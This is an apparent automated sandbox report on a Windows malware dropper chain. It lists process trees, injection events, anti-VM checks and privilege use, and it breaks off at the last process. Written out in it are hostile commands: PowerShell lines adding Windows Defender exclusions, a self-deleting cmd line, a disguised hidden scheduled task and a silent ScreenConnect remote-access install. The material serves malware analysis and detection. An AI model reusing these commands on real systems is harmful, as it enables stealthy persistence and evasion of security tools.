description pid Process Token: SeDebugPrivilege 5012 NN9Dd7c.exe Token: SeDebugPrivilege 4364 powershell.exe Token: SeDebugPrivilege 788 powershell.exe Token: SeDebugPrivilege 2332 ga70pjP.exe Token: SeShutdownPrivilege 4484 msiexec.exe Token: SeIncreaseQuotaPrivilege 4484 msiexec.exe Token: SeSecurityPrivilege 5000 msiexec.exe Token: SeCreateTokenPrivilege 4484 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4484 msiexec.exe Token: SeLockMemoryPrivilege 4484 msiexec.exe Token: SeIncreaseQuotaPrivilege 4484 msiexec.exe Token: SeMachineAccountPrivilege 4484 msiexec.exe Token: SeTcbPrivilege 4484 msiexec.exe Token: SeSecurityPrivilege 4484 msiexec.exe Token: SeTakeOwnershipPrivilege 4484 msiexec.exe Token: SeLoadDriverPrivilege 4484 msiexec.exe Token: SeSystemProfilePrivilege 4484 msiexec.exe Token: SeSystemtimePrivilege 4484 msiexec.exe Token: SeProfSingleProcessPrivilege 4484 msiexec.exe Token: SeIncBasePriorityPrivilege 4484 msiexec.exe Token: SeCreatePagefilePrivilege 4484 msiexec.exe Token: SeCreatePermanentPrivilege 4484 msiexec.exe Token: SeBackupPrivilege 4484 msiexec.exe Token: SeRestorePrivilege 4484 msiexec.exe Token: SeShutdownPrivilege 4484 msiexec.exe Token: SeDebugPrivilege 4484 msiexec.exe Token: SeAuditPrivilege 4484 msiexec.exe Token: SeSystemEnvironmentPrivilege 4484 msiexec.exe Token: SeChangeNotifyPrivilege 4484 msiexec.exe Token: SeRemoteShutdownPrivilege 4484 msiexec.exe Token: SeUndockPrivilege 4484 msiexec.exe Token: SeSyncAgentPrivilege 4484 msiexec.exe Token: SeEnableDelegationPrivilege 4484 msiexec.exe Token: SeManageVolumePrivilege 4484 msiexec.exe Token: SeImpersonatePrivilege 4484 msiexec.exe Token: SeCreateGlobalPrivilege 4484 msiexec.exe Token: SeCreateTokenPrivilege 4484 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4484 msiexec.exe Token: SeLockMemoryPrivilege 4484 msiexec.exe Token: SeIncreaseQuotaPrivilege 4484 msiexec.exe Token: SeMachineAccountPrivilege 4484 msiexec.exe Token: SeTcbPrivilege 4484 msiexec.exe Token: SeSecurityPrivilege 4484 msiexec.exe Token: SeTakeOwnershipPrivilege 4484 msiexec.exe Token: SeLoadDriverPrivilege 4484 msiexec.exe Token: SeSystemProfilePrivilege 4484 msiexec.exe Token: SeSystemtimePrivilege 4484 msiexec.exe Token: SeProfSingleProcessPrivilege 4484 msiexec.exe Token: SeIncBasePriorityPrivilege 4484 msiexec.exe Token: SeCreatePagefilePrivilege 4484 msiexec.exe Token: SeCreatePermanentPrivilege 4484 msiexec.exe Token: SeBackupPrivilege 4484 msiexec.exe Token: SeRestorePrivilege 4484 msiexec.exe Token: SeShutdownPrivilege 4484 msiexec.exe Token: SeDebugPrivilege 4484 msiexec.exe Token: SeAuditPrivilege 4484 msiexec.exe Token: SeSystemEnvironmentPrivilege 4484 msiexec.exe Token: SeChangeNotifyPrivilege 4484 msiexec.exe Token: SeRemoteShutdownPrivilege 4484 msiexec.exe Token: SeUndockPrivilege 4484 msiexec.exe Token: SeSyncAgentPrivilege 4484 msiexec.exe Token: SeEnableDelegationPrivilege 4484 msiexec.exe Token: SeManageVolumePrivilege 4484 msiexec.exe Token: SeImpersonatePrivilege 4484 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2000 c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe 4484 msiexec.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 4484 msiexec.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 7256 msedge.exe 7256 msedge.exe 7256 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 7820 firefox.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 6024 249e4c4aa2.exe 7256 msedge.exe 7256 msedge.exe 7256 msedge.exe 7256 msedge.exe 7256 msedge.exe 7256 msedge.exe 7256 msedge.exe 7256 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 7820 firefox.exe 216 6255b429668f48439480e235dec40213.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2000 wrote to memory of 2308 2000 c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe 83 PID 2000 wrote to memory of 2308 2000 c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe 83 PID 2000 wrote to memory of 2308 2000 c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe 83 PID 2308 wrote to memory of 1724 2308 axplong.exe 86 PID 2308 wrote to memory of 1724 2308 axplong.exe 86 PID 2308 wrote to memory of 1724 2308 axplong.exe 86 PID 2308 wrote to memory of 2344 2308 axplong.exe 87 PID 2308 wrote to memory of 2344 2308 axplong.exe 87 PID 2308 wrote to memory of 2344 2308 axplong.exe 87 PID 2344 wrote to memory of 4832 2344 49d316d08a.exe 88 PID 2344 wrote to memory of 4832 2344 49d316d08a.exe 88 PID 2344 wrote to memory of 4832 2344 49d316d08a.exe 88 PID 2344 wrote to memory of 4832 2344 49d316d08a.exe 88 PID 2344 wrote to memory of 4832 2344 49d316d08a.exe 88 PID 2308 wrote to memory of 2956 2308 axplong.exe 93 PID 2308 wrote to memory of 2956 2308 axplong.exe 93 PID 2308 wrote to memory of 2956 2308 axplong.exe 93 PID 2956 wrote to memory of 4084 2956 8213f04b29.exe 96 PID 2956 wrote to memory of 4084 2956 8213f04b29.exe 96 PID 2956 wrote to memory of 4084 2956 8213f04b29.exe 96 PID 2308 wrote to memory of 860 2308 axplong.exe 103 PID 2308 wrote to memory of 860 2308 axplong.exe 103 PID 2308 wrote to memory of 860 2308 axplong.exe 103 PID 4084 wrote to memory of 5012 4084 skotes.exe 104 PID 4084 wrote to memory of 5012 4084 skotes.exe 104 PID 4084 wrote to memory of 5012 4084 skotes.exe 104 PID 5012 wrote to memory of 4364 5012 NN9Dd7c.exe 110 PID 5012 wrote to memory of 4364 5012 NN9Dd7c.exe 110 PID 5012 wrote to memory of 4364 5012 NN9Dd7c.exe 110 PID 5012 wrote to memory of 788 5012 NN9Dd7c.exe 112 PID 5012 wrote to memory of 788 5012 NN9Dd7c.exe 112 PID 5012 wrote to memory of 788 5012 NN9Dd7c.exe 112 PID 4084 wrote to memory of 2332 4084 skotes.exe 114 PID 4084 wrote to memory of 2332 4084 skotes.exe 114 PID 4084 wrote to memory of 2332 4084 skotes.exe 114 PID 2332 wrote to memory of 4484 2332 ga70pjP.exe 115 PID 2332 wrote to memory of 4484 2332 ga70pjP.exe 115 PID 2332 wrote to memory of 4484 2332 ga70pjP.exe 115 PID 5000 wrote to memory of 2432 5000 msiexec.exe 121 PID 5000 wrote to memory of 2432 5000 msiexec.exe 121 PID 5000 wrote to memory of 2432 5000 msiexec.exe 121 PID 2432 wrote to memory of 3612 2432 MsiExec.exe 122 PID 2432 wrote to memory of 3612 2432 MsiExec.exe 122 PID 2432 wrote to memory of 3612 2432 MsiExec.exe 122 PID 4084 wrote to memory of 2100 4084 skotes.exe 123 PID 4084 wrote to memory of 2100 4084 skotes.exe 123 PID 4084 wrote to memory of 2100 4084 skotes.exe 123 PID 5012 wrote to memory of 2940 5012 NN9Dd7c.exe 127 PID 5012 wrote to memory of 2940 5012 NN9Dd7c.exe 127 PID 5012 wrote to memory of 2940 5012 NN9Dd7c.exe 127 PID 5012 wrote to memory of 1636 5012 NN9Dd7c.exe 128 PID 5012 wrote to memory of 1636 5012 NN9Dd7c.exe 128 PID 4084 wrote to memory of 3768 4084 skotes.exe 130 PID 4084 wrote to memory of 3768 4084 skotes.exe 130 PID 4084 wrote to memory of 3768 4084 skotes.exe 130 PID 1636 wrote to memory of 2372 1636 031f7bd31e8a4659ac424ac81239be01.exe 133 PID 1636 wrote to memory of 2372 1636 031f7bd31e8a4659ac424ac81239be01.exe 133 PID 2372 wrote to memory of 1064 2372 msedge.exe 134 PID 2372 wrote to memory of 1064 2372 msedge.exe 134 PID 2940 wrote to memory of 3652 2940 ed288029eb9e4563bf671b4ce1f8b61f.exe 135 PID 2940 wrote to memory of 3652 2940 ed288029eb9e4563bf671b4ce1f8b61f.exe 135 PID 2940 wrote to memory of 3652 2940 ed288029eb9e4563bf671b4ce1f8b61f.exe 135 PID 3652 wrote to memory of 952 3652 cmd.exe 137 PID 3652 wrote to memory of 952 3652 cmd.exe 137 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 3348 attrib.exe 5648 attrib.exe 2240 attrib.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2992
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4832
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:7240
-
-
C:\Users\Admin\AppData\Local\Temp\c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe"C:\Users\Admin\AppData\Local\Temp\c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Users\Admin\AppData\Local\Temp\1007460001\510c47326c.exe"C:\Users\Admin\AppData\Local\Temp\1007460001\510c47326c.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1724
-
-
C:\Users\Admin\AppData\Local\Temp\1007461001\49d316d08a.exe"C:\Users\Admin\AppData\Local\Temp\1007461001\49d316d08a.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 5364⤵
- Program crash
PID:4284
-
-
-
C:\Users\Admin\AppData\Local\Temp\1007462001\8213f04b29.exe"C:\Users\Admin\AppData\Local\Temp\1007462001\8213f04b29.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\jiizxvxmg"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4364
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\jiizxvxmg\ed288029eb9e4563bf671b4ce1f8b61f.exe"C:\jiizxvxmg\ed288029eb9e4563bf671b4ce1f8b61f.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\jiizxvxmg\ed288029eb9e4563bf671b4ce1f8b61f.exe" & rd /s /q "C:\ProgramData\7YU3OPPZC2VA" & exit7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\SysWOW64\timeout.exetimeout /t 108⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:952
-
-
-
-
C:\jiizxvxmg\031f7bd31e8a4659ac424ac81239be01.exe"C:\jiizxvxmg\031f7bd31e8a4659ac424ac81239be01.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi7⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd474946f8,0x7ffd47494708,0x7ffd474947188⤵PID:1064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,11689541293643016840,6600075709996844989,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:28⤵PID:448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,11689541293643016840,6600075709996844989,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:38⤵
- Suspicious behavior: EnumeratesProcesses
PID:2964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,11689541293643016840,6600075709996844989,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:88⤵PID:1240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11689541293643016840,6600075709996844989,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:18⤵PID:1924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11689541293643016840,6600075709996844989,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:18⤵PID:728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11689541293643016840,6600075709996844989,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:18⤵PID:5900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11689541293643016840,6600075709996844989,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:18⤵PID:5908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11689541293643016840,6600075709996844989,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:18⤵PID:5776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11689541293643016840,6600075709996844989,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:18⤵PID:5812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,11689541293643016840,6600075709996844989,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:88⤵PID:5436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,11689541293643016840,6600075709996844989,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:88⤵
- Suspicious behavior: EnumeratesProcesses
PID:5684
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"6⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4484
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017712001\d82d5e19cd.exe"C:\Users\Admin\AppData\Local\Temp\1017712001\d82d5e19cd.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2100 -
C:\Users\Admin\AppData\Local\Temp\1017712001\d82d5e19cd.exe"C:\Users\Admin\AppData\Local\Temp\1017712001\d82d5e19cd.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6296
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017716001\a91d9902ae.exe"C:\Users\Admin\AppData\Local\Temp\1017716001\a91d9902ae.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3768
-
-
C:\Users\Admin\AppData\Local\Temp\1017717001\ee82c69916.exe"C:\Users\Admin\AppData\Local\Temp\1017717001\ee82c69916.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5784 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"6⤵PID:5128
-
C:\Windows\system32\mode.commode 65,107⤵PID:904
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p24291711423417250691697322505 -oextracted7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5352
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5468
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5540
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:236
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5616
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5660
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4168
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2540
-
-
C:\Windows\system32\attrib.exeattrib +H "in.exe"7⤵
- Views/modifies file attributes
PID:2240
-
-
C:\Users\Admin\AppData\Local\Temp\main\in.exe"in.exe"7⤵
- Executes dropped EXE
PID:4828 -
C:\Windows\SYSTEM32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe8⤵
- Views/modifies file attributes
PID:5648
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe8⤵
- Views/modifies file attributes
PID:3348
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE8⤵
- Scheduled Task/Job: Scheduled Task
PID:5680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del in.exe8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5548 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.19⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5244
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017718001\3e0edd2e8e.exe"C:\Users\Admin\AppData\Local\Temp\1017718001\3e0edd2e8e.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5576 -
C:\Users\Admin\AppData\Local\Temp\1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe"C:\Users\Admin\AppData\Local\Temp\1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe"6⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6220
-
-
C:\Users\Admin\AppData\Local\Temp\WL4Y4FXIXEA30MCREVVA8ZXBD9L.exe"C:\Users\Admin\AppData\Local\Temp\WL4Y4FXIXEA30MCREVVA8ZXBD9L.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7364
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017719001\8ebc32d904.exe"C:\Users\Admin\AppData\Local\Temp\1017719001\8ebc32d904.exe"5⤵
